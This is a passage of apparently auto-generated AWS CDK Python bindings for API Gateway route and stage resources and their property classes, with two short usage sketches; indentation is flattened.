return 'ParameterConstraintsProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
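# Usage sketch for ``CfnRouteV2``: a WebSocket-style route whose ``target``
# points at an existing integration by id, using the documented
# ``integrations/{integration-id}`` format. The route key is hypothetical.
def _example_route(stack: aws_cdk.core.Stack, api_id: str, integration_id: str) -> CfnRouteV2:
    return CfnRouteV2(
        stack, "SendRoute",
        api_id=api_id,
        route_key="sendmessage",                  # hypothetical custom route key
        authorization_type="NONE",
        target="integrations/" + integration_id,  # documented target format
    )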
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRouteV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'route_key': 'routeKey', 'api_key_required': 'apiKeyRequired', 'authorization_scopes': 'authorizationScopes', 'authorization_type': 'authorizationType', 'authorizer_id': 'authorizerId', 'model_selection_expression': 'modelSelectionExpression', 'operation_name': 'operationName', 'request_models': 'requestModels', 'request_parameters': 'requestParameters', 'route_response_selection_expression': 'routeResponseSelectionExpression', 'target': 'target'})
class CfnRouteV2Props():
def __init__(self, *, api_id: str, route_key: str, api_key_required: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, authorization_scopes: typing.Optional[typing.List[str]]=None, authorization_type: typing.Optional[str]=None, authorizer_id: typing.Optional[str]=None, model_selection_expression: typing.Optional[str]=None, operation_name: typing.Optional[str]=None, request_models: typing.Any=None, request_parameters: typing.Any=None, route_response_selection_expression: typing.Optional[str]=None, target: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::Route``.
:param api_id: ``AWS::ApiGatewayV2::Route.ApiId``.
:param route_key: ``AWS::ApiGatewayV2::Route.RouteKey``.
:param api_key_required: ``AWS::ApiGatewayV2::Route.ApiKeyRequired``.
:param authorization_scopes: ``AWS::ApiGatewayV2::Route.AuthorizationScopes``.
:param authorization_type: ``AWS::ApiGatewayV2::Route.AuthorizationType``.
:param authorizer_id: ``AWS::ApiGatewayV2::Route.AuthorizerId``.
:param model_selection_expression: ``AWS::ApiGatewayV2::Route.ModelSelectionExpression``.
:param operation_name: ``AWS::ApiGatewayV2::Route.OperationName``.
:param request_models: ``AWS::ApiGatewayV2::Route.RequestModels``.
:param request_parameters: ``AWS::ApiGatewayV2::Route.RequestParameters``.
:param route_response_selection_expression: ``AWS::ApiGatewayV2::Route.RouteResponseSelectionExpression``.
:param target: ``AWS::ApiGatewayV2::Route.Target``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html
"""
self._values = {
'api_id': api_id,
'route_key': route_key,
}
if api_key_required is not None: self._values["api_key_required"] = api_key_required
if authorization_scopes is not None: self._values["authorization_scopes"] = authorization_scopes
if authorization_type is not None: self._values["authorization_type"] = authorization_type
if authorizer_id is not None: self._values["authorizer_id"] = authorizer_id
if model_selection_expression is not None: self._values["model_selection_expression"] = model_selection_expression
if operation_name is not None: self._values["operation_name"] = operation_name
if request_models is not None: self._values["request_models"] = request_models
if request_parameters is not None: self._values["request_parameters"] = request_parameters
if route_response_selection_expression is not None: self._values["route_response_selection_expression"] = route_response_selection_expression
if target is not None: self._values["target"] = target
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Route.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-apiid
"""
return self._values.get('api_id')
@property
def route_key(self) -> str:
"""``AWS::ApiGatewayV2::Route.RouteKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-routekey
"""
return self._values.get('route_key')
@property
def api_key_required(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGatewayV2::Route.ApiKeyRequired``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-apikeyrequired
"""
return self._values.get('api_key_required')
@property
def authorization_scopes(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGatewayV2::Route.AuthorizationScopes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-authorizationscopes
"""
return self._values.get('authorization_scopes')
@property
def authorization_type(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.AuthorizationType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-authorizationtype
"""
return self._values.get('authorization_type')
@property
def authorizer_id(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.AuthorizerId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-authorizerid
"""
return self._values.get('authorizer_id')
@property
def model_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.ModelSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-modelselectionexpression
"""
return self._values.get('model_selection_expression')
@property
def operation_name(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.OperationName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-operationname
"""
return self._values.get('operation_name')
@property
def request_models(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Route.RequestModels``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-requestmodels
"""
return self._values.get('request_models')
@property
def request_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Route.RequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-requestparameters
"""
return self._values.get('request_parameters')
@property
def route_response_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.RouteResponseSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-routeresponseselectionexpression
"""
return self._values.get('route_response_selection_expression')
@property
def target(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.Target``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-target
"""
return self._values.get('target')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnRouteV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
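# Usage sketch: only ``api_id`` and ``route_key`` are required on
# ``CfnRouteV2Props``; every other field defaults to ``None``.
def _example_route_props(api_id: str) -> CfnRouteV2Props:
    return CfnRouteV2Props(
        api_id=api_id,
        route_key="$connect",     # built-in WebSocket connect route
        api_key_required=False,
        operation_name="Connect",
    )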
@jsii.implements(aws_cdk.core.IInspectable)
class CfnStage(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnStage"):
"""A CloudFormation ``AWS::ApiGateway::Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::Stage
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, rest_api_id: str, access_log_setting: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["AccessLogSettingProperty"]]]=None, cache_cluster_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, cache_cluster_size: typing.Optional[str]=None, canary_setting: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CanarySettingProperty"]]]=None, client_certificate_id: typing.Optional[str]=None, deployment_id: typing.Optional[str]=None, description: typing.Optional[str]=None, documentation_version: typing.Optional[str]=None, method_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "MethodSettingProperty"]]]]]=None, stage_name: typing.Optional[str]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None, tracing_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, variables: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None) -> None:
"""Create a new ``AWS::ApiGateway::Stage``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param rest_api_id: ``AWS::ApiGateway::Stage.RestApiId``.
:param access_log_setting: ``AWS::ApiGateway::Stage.AccessLogSetting``.
:param cache_cluster_enabled: ``AWS::ApiGateway::Stage.CacheClusterEnabled``.
:param cache_cluster_size: ``AWS::ApiGateway::Stage.CacheClusterSize``.
:param canary_setting: ``AWS::ApiGateway::Stage.CanarySetting``.
:param client_certificate_id: ``AWS::ApiGateway::Stage.ClientCertificateId``.
:param deployment_id: ``AWS::ApiGateway::Stage.DeploymentId``.
:param description: ``AWS::ApiGateway::Stage.Description``.
:param documentation_version: ``AWS::ApiGateway::Stage.DocumentationVersion``.
:param method_settings: ``AWS::ApiGateway::Stage.MethodSettings``.
:param stage_name: ``AWS::ApiGateway::Stage.StageName``.
:param tags: ``AWS::ApiGateway::Stage.Tags``.
:param tracing_enabled: ``AWS::ApiGateway::Stage.TracingEnabled``.
:param variables: ``AWS::ApiGateway::Stage.Variables``.
"""
props = CfnStageProps(rest_api_id=rest_api_id, access_log_setting=access_log_setting, cache_cluster_enabled=cache_cluster_enabled, cache_cluster_size=cache_cluster_size, canary_setting=canary_setting, client_certificate_id=client_certificate_id, deployment_id=deployment_id, description=description, documentation_version=documentation_version, method_settings=method_settings, stage_name=stage_name, tags=tags, tracing_enabled=tracing_enabled, variables=variables)
jsii.create(CfnStage, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGateway::Stage.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Stage.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="accessLogSetting")
def access_log_setting(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["AccessLogSettingProperty"]]]:
"""``AWS::ApiGateway::Stage.AccessLogSetting``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-accesslogsetting
"""
return jsii.get(self, "accessLogSetting")
@access_log_setting.setter
def access_log_setting(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["AccessLogSettingProperty"]]]):
return jsii.set(self, "accessLogSetting", value)
@property
@jsii.member(jsii_name="cacheClusterEnabled")
def cache_cluster_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::Stage.CacheClusterEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-cacheclusterenabled
"""
return jsii.get(self, "cacheClusterEnabled")
@cache_cluster_enabled.setter
def cache_cluster_enabled(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "cacheClusterEnabled", value)
@property
@jsii.member(jsii_name="cacheClusterSize")
def cache_cluster_size(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.CacheClusterSize``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-cacheclustersize
"""
return jsii.get(self, "cacheClusterSize")
@cache_cluster_size.setter
def cache_cluster_size(self, value: typing.Optional[str]):
return jsii.set(self, "cacheClusterSize", value)
@property
@jsii.member(jsii_name="canarySetting")
def canary_setting(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CanarySettingProperty"]]]:
"""``AWS::ApiGateway::Stage.CanarySetting``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-canarysetting
"""
return jsii.get(self, "canarySetting")
@canary_setting.setter
def canary_setting(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CanarySettingProperty"]]]):
return jsii.set(self, "canarySetting", value)
@property
@jsii.member(jsii_name="clientCertificateId")
def client_certificate_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.ClientCertificateId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-clientcertificateid
"""
return jsii.get(self, "clientCertificateId")
@client_certificate_id.setter
def client_certificate_id(self, value: typing.Optional[str]):
return jsii.set(self, "clientCertificateId", value)
@property
@jsii.member(jsii_name="deploymentId")
def deployment_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.DeploymentId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-deploymentid
"""
return jsii.get(self, "deploymentId")
@deployment_id.setter
def deployment_id(self, value: typing.Optional[str]):
return jsii.set(self, "deploymentId", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="documentationVersion")
def documentation_version(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.DocumentationVersion``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-documentationversion
"""
return jsii.get(self, "documentationVersion")
@documentation_version.setter
def documentation_version(self, value: typing.Optional[str]):
return jsii.set(self, "documentationVersion", value)
@property
@jsii.member(jsii_name="methodSettings")
def method_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "MethodSettingProperty"]]]]]:
"""``AWS::ApiGateway::Stage.MethodSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-methodsettings
"""
return jsii.get(self, "methodSettings")
@method_settings.setter
def method_settings(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "MethodSettingProperty"]]]]]):
return jsii.set(self, "methodSettings", value)
@property
@jsii.member(jsii_name="stageName")
def stage_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-stagename
"""
return jsii.get(self, "stageName")
@stage_name.setter
def stage_name(self, value: typing.Optional[str]):
return jsii.set(self, "stageName", value)
@property
@jsii.member(jsii_name="tracingEnabled")
def tracing_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::Stage.TracingEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-tracingenabled
"""
return jsii.get(self, "tracingEnabled")
@tracing_enabled.setter
def tracing_enabled(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "tracingEnabled", value)
@property
@jsii.member(jsii_name="variables")
def variables(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::Stage.Variables``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-variables
"""
return jsii.get(self, "variables")
@variables.setter
def variables(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]):
return jsii.set(self, "variables", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnStage.AccessLogSettingProperty", jsii_struct_bases=[], name_mapping={'destination_arn': 'destinationArn', 'format': 'format'})
class AccessLogSettingProperty():
def __init__(self, *, destination_arn: typing.Optional[str]=None, format: typing.Optional[str]=None):
"""
:param destination_arn: ``CfnStage.AccessLogSettingProperty.DestinationArn``.
:param format: ``CfnStage.AccessLogSettingProperty.Format``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-accesslogsetting.html
"""
self._values = {
}
if destination_arn is not None: self._values["destination_arn"] = destination_arn
if format is not None: self._values["format"] = format
@property
def destination_arn(self) -> typing.Optional[str]:
"""``CfnStage.AccessLogSettingProperty.DestinationArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-accesslogsetting.html#cfn-apigateway-stage-accesslogsetting-destinationarn
"""
return self._values.get('destination_arn')
@property
def format(self) -> typing.Optional[str]:
"""``CfnStage.AccessLogSettingProperty.Format``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-accesslogsetting.html#cfn-apigateway-stage-accesslogsetting-format
"""
return self._values.get('format')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'AccessLogSettingProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnStage.CanarySettingProperty", jsii_struct_bases=[], name_mapping={'deployment_id': 'deploymentId', 'percent_traffic': 'percentTraffic', 'stage_variable_overrides': 'stageVariableOverrides', 'use_stage_cache': 'useStageCache'})
class CanarySettingProperty():
def __init__(self, *, deployment_id: typing.Optional[str]=None, percent_traffic: typing.Optional[jsii.Number]=None, stage_variable_overrides: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, use_stage_cache: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None):
"""
:param deployment_id: ``CfnStage.CanarySettingProperty.DeploymentId``.
:param percent_traffic: ``CfnStage.CanarySettingProperty.PercentTraffic``.
:param stage_variable_overrides: ``CfnStage.CanarySettingProperty.StageVariableOverrides``.
:param use_stage_cache: ``CfnStage.CanarySettingProperty.UseStageCache``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-canarysetting.html
"""
self._values = {
}
if deployment_id is not None: self._values["deployment_id"] = deployment_id
if percent_traffic is not None: self._values["percent_traffic"] = percent_traffic
if stage_variable_overrides is not None: self._values["stage_variable_overrides"] = stage_variable_overrides
if use_stage_cache is not None: self._values["use_stage_cache"] = use_stage_cache
@property
def deployment_id(self) -> typing.Optional[str]:
"""``CfnStage.CanarySettingProperty.DeploymentId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-canarysetting.html#cfn-apigateway-stage-canarysetting-deploymentid
"""
return self._values.get('deployment_id')
@property
def percent_traffic(self) -> typing.Optional[jsii.Number]:
"""``CfnStage.CanarySettingProperty.PercentTraffic``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-canarysetting.html#cfn-apigateway-stage-canarysetting-percenttraffic
"""
return self._values.get('percent_traffic')
@property
def stage_variable_overrides(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnStage.CanarySettingProperty.StageVariableOverrides``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-canarysetting.html#cfn-apigateway-stage-canarysetting-stagevariableoverrides
"""
return self._values.get('stage_variable_overrides')
@property
def use_stage_cache(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnStage.CanarySettingProperty.UseStageCache``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-canarysetting.html#cfn-apigateway-stage-canarysetting-usestagecache
"""
return self._values.get('use_stage_cache')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CanarySettingProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnStage.MethodSettingProperty", jsii_struct_bases=[], name_mapping={'cache_data_encrypted': 'cacheDataEncrypted', 'cache_ttl_in_seconds': 'cacheTtlInSeconds', 'caching_enabled': 'cachingEnabled', 'data_trace_enabled': 'dataTraceEnabled', 'http_method': 'httpMethod', 'logging_level': 'loggingLevel', 'metrics_enabled': 'metricsEnabled', 'resource_path': 'resourcePath', 'throttling_burst_limit': 'throttlingBurstLimit', 'throttling_rate_limit': 'throttlingRateLimit'})
class MethodSettingProperty():
def __init__(self, *, cache_data_encrypted: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, cache_ttl_in_seconds: typing.Optional[jsii.Number]=None, caching_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, data_trace_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, http_method: typing.Optional[str]=None, logging_level: typing.Optional[str]=None, metrics_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, resource_path: typing.Optional[str]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None):
"""
:param cache_data_encrypted: ``CfnStage.MethodSettingProperty.CacheDataEncrypted``.
:param cache_ttl_in_seconds: ``CfnStage.MethodSettingProperty.CacheTtlInSeconds``.
:param caching_enabled: ``CfnStage.MethodSettingProperty.CachingEnabled``.
:param data_trace_enabled: ``CfnStage.MethodSettingProperty.DataTraceEnabled``.
:param http_method: ``CfnStage.MethodSettingProperty.HttpMethod``.
:param logging_level: ``CfnStage.MethodSettingProperty.LoggingLevel``.
:param metrics_enabled: ``CfnStage.MethodSettingProperty.MetricsEnabled``.
:param resource_path: ``CfnStage.MethodSettingProperty.ResourcePath``.
:param throttling_burst_limit: ``CfnStage.MethodSettingProperty.ThrottlingBurstLimit``.
:param throttling_rate_limit: ``CfnStage.MethodSettingProperty.ThrottlingRateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-methodsetting.html
"""
self._values = {
}
if cache_data_encrypted is not None: self._values["cache_data_encrypted"] = cache_data_encrypted
if cache_ttl_in_seconds is not None: self._values["cache_ttl_in_seconds"] = cache_ttl_in_seconds
if caching_enabled is not None: self._values["caching_enabled"] = caching_enabled
if data_trace_enabled is not None: self._values["data_trace_enabled"] = data_trace_enabled
if http_method is not None: self._values["http_method"] = http_method
if logging_level is not None: self._values["logging_level"] = logging_level
if metrics_enabled is not None: self._values["metrics_enabled"] = metrics_enabled
if resource_path is not None: self._values["resource_path"] = resource_path
if throttling_burst_limit is not None: self._values["throttling_burst_limit"] = throttling_burst_limit
if throttling_rate_limit is not None: self._values["throttling_rate_limit"] = throttling_rate_limit
@property
def cache_data_encrypted(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnStage.MethodSettingProperty.CacheDataEncrypted``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-cachedataencrypted
"""
return self._values.get('cache_data_encrypted')
@property
def cache_ttl_in_seconds(self) -> typing.Optional[jsii.Number]:
"""``CfnStage.MethodSettingProperty.CacheTtlInSeconds``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-cachettlinseconds
"""
return self._values.get('cache_ttl_in_seconds')
@property
def caching_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnStage.MethodSettingProperty.CachingEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-cachingenabled
"""
return self._values.get('caching_enabled')
@property
def data_trace_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnStage.MethodSettingProperty.DataTraceEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-datatraceenabled
"""
return self._values.get('data_trace_enabled')
@property
def http_method(self) -> typing.Optional[str]:
"""``CfnStage.MethodSettingProperty.HttpMethod``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-httpmethod
"""
return self._values.get('http_method')
@property
def logging_level(self) -> typing.Optional[str]:
"""``CfnStage.MethodSettingProperty.LoggingLevel``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-logginglevel
"""
return self._values.get('logging_level')
@property
def metrics_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnStage.MethodSettingProperty.MetricsEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-metricsenabled
"""
return self._values.get('metrics_enabled')
@property
def resource_path(self) -> typing.Optional[str]:
"""``CfnStage.MethodSettingProperty.ResourcePath``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-resourcepath
"""
return self._values.get('resource_path')
@property
def throttling_burst_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnStage.MethodSettingProperty.ThrottlingBurstLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-throttlingburstlimit
"""
return self._values.get('throttling_burst_limit')
@property
def throttling_rate_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnStage.MethodSettingProperty.ThrottlingRateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-throttlingratelimit
"""
return self._values.get('throttling_rate_limit')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'MethodSettingProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
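# Illustrative usage sketch (not part of the generated bindings): building a
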